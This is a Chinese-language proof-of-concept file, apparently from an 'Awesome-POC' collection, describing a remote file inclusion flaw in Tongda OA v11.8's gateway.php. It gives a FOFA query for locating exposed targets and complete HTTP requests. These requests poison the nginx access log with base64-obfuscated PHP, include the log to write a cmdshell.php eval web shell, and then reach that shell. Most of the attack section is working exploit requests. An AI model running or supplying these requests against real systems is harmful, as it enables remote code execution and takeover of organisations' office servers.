Awesome-POC/OA产品漏洞/通达OA v11.8 getway.php 远程文件包含漏洞.md

68 lines
1.7 KiB
Markdown
Raw Normal View History

2022-05-20 15:57:09 +08:00
# 通达OA v11.8 getway.php 远程文件包含漏洞
## 漏洞描述
通达OA v11.8 getway.php 存在文件包含漏洞,攻击者通过发送恶意请求包含日志文件导致任意文件写入漏洞
## 漏洞影响
```
通达OA v11.8
```
## FOFA
```
app="TDXK-通达OA"
```
## 漏洞复现
登陆页面
![image-20220520154525896](https://typora-notes-1308934770.cos.ap-beijing.myqcloud.com/202205201545994.png)
发送恶意请求让日志被记录
```
GET /d1a4278d?json={}&aa=<?php @fputs(fopen(base64_decode('Y21kc2hlbGwucGhw'),w),base64_decode('PD9waHAgQGV2YWwoJF9QT1NUWydjbWRzaGVsbCddKTs/Pg=='));?> HTTP/1.1
Host:
User-Agent: Go-http-client/1.1
Accept-Encoding: gzip
```
![image-20220520154539264](https://typora-notes-1308934770.cos.ap-beijing.myqcloud.com/202205201545324.png)
在通过漏洞包含日志文件
```
POST /ispirit/interface/gateway.php HTTP/1.1
Host:
User-Agent: Go-http-client/1.1
Content-Length: 54
Content-Type: application/x-www-form-urlencoded
Accept-Encoding: gzip
json={"url":"/general/../../nginx/logs/oa.access.log"}
```
![image-20220520154553517](https://typora-notes-1308934770.cos.ap-beijing.myqcloud.com/202205201545558.png)
再次发送恶意请求写入文件
```
POST /mac/gateway.php HTTP/1.1
Host:
User-Agent: Go-http-client/1.1
Content-Length: 54
Content-Type: application/x-www-form-urlencoded
Accept-Encoding: gzip
json={"url":"/general/../../nginx/logs/oa.access.log"}
```
![image-20220520154607791](https://typora-notes-1308934770.cos.ap-beijing.myqcloud.com/202205201546852.png)
访问写入的文件 `/mac/cmdshell.php`
![image-20220520154623095](https://typora-notes-1308934770.cos.ap-beijing.myqcloud.com/202205201546179.png)